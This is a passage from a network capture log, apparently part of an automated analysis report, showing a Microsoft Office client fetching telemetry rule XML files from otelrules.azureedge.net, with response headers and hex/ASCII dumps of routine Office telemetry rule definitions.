                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:45:09 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:45:09 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 1352
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                                                                          ETag: "0x8DC582BE9DEEE28"
                                                                                                                                                                                          x-ms-request-id: 9064b291-801e-0048-1d16-3df3fb000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164509Z-178bfbc474bp8mkvhC1NYCzqnn00000004kg000000008x1n
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:45:09 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          108192.168.2.54987513.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:45:08 UTC192OUTGET /rules/rule702950v1s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:45:09 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:45:09 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 1368
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                          ETag: "0x8DC582BDDC22447"
                                                                                                                                                                                          x-ms-request-id: 110996dd-801e-0048-7360-3bf3fb000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164509Z-178bfbc474brk967hC1NYCfu6000000004k0000000006u26
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:45:09 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          109192.168.2.54987813.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:45:08 UTC192OUTGET /rules/rule701150v1s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:45:09 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:45:09 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 1364
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                          ETag: "0x8DC582BE1223606"
                                                                                                                                                                                          x-ms-request-id: dcdca57e-b01e-003e-0dcb-3b8e41000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164509Z-15b8b599d88pxmdghC1TEBux9c00000003bg00000000773g
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:45:09 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          110192.168.2.54987713.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:45:09 UTC192OUTGET /rules/rule701151v1s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:45:09 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:45:09 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 1401
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                                          ETag: "0x8DC582BE055B528"
                                                                                                                                                                                          x-ms-request-id: 3272c5ec-601e-003d-7d76-3b6f25000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164509Z-174c587ffdfn4nhwhC1TEB2nbc000000034g00000000t56t
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:45:09 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          111192.168.2.54988013.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:45:10 UTC192OUTGET /rules/rule702201v1s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:45:11 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:45:11 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 1397
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                                                                                                                                                                          ETag: "0x8DC582BE7262739"
                                                                                                                                                                                          x-ms-request-id: 9aa8fa60-a01e-001e-5131-3c49ef000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164511Z-178bfbc474bbcwv4hC1NYCypys00000004ng000000004ry7
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:45:11 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          112192.168.2.54987913.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:45:11 UTC192OUTGET /rules/rule702200v1s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:45:11 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:45:11 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 1360
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                          ETag: "0x8DC582BDDEB5124"
                                                                                                                                                                                          x-ms-request-id: 358685dd-301e-005d-4f7d-3be448000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164511Z-174c587ffdfks6tlhC1TEBeza4000000037g00000000f19e
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:45:11 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          113192.168.2.54988113.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:45:11 UTC192OUTGET /rules/rule700401v2s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:45:11 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:45:11 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 1403
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                          ETag: "0x8DC582BDCB4853F"
                                                                                                                                                                                          x-ms-request-id: eb1e057a-b01e-0097-688c-3a4f33000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164511Z-174c587ffdf89smkhC1TEB697s000000035g00000000nmhh
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:45:11 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          114192.168.2.54988213.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:45:11 UTC192OUTGET /rules/rule700400v2s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:45:11 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:45:11 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 1366
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                                                                                          ETag: "0x8DC582BDB779FC3"
                                                                                                                                                                                          x-ms-request-id: a0a34a76-601e-0050-3b16-3d2c9c000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164511Z-178bfbc474b9xljthC1NYCtw9400000004kg00000000eg8q
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:45:11 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          115192.168.2.54988313.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:45:11 UTC192OUTGET /rules/rule700351v1s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:45:11 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:45:11 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 1397
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                          ETag: "0x8DC582BDFD43C07"
                                                                                                                                                                                          x-ms-request-id: c780bae6-901e-005b-04c5-3b2005000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164511Z-174c587ffdfldtt2hC1TEBwv9c00000002z000000000h5p5
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:45:11 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          116192.168.2.54988513.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:45:13 UTC192OUTGET /rules/rule703901v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:45:13 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:45:13 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 1427
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                          ETag: "0x8DC582BE56F6873"
                                                                                                                                                                                          x-ms-request-id: 38a59648-401e-00ac-39a0-3b0a97000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164513Z-174c587ffdfks6tlhC1TEBeza4000000036000000000m5sn
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
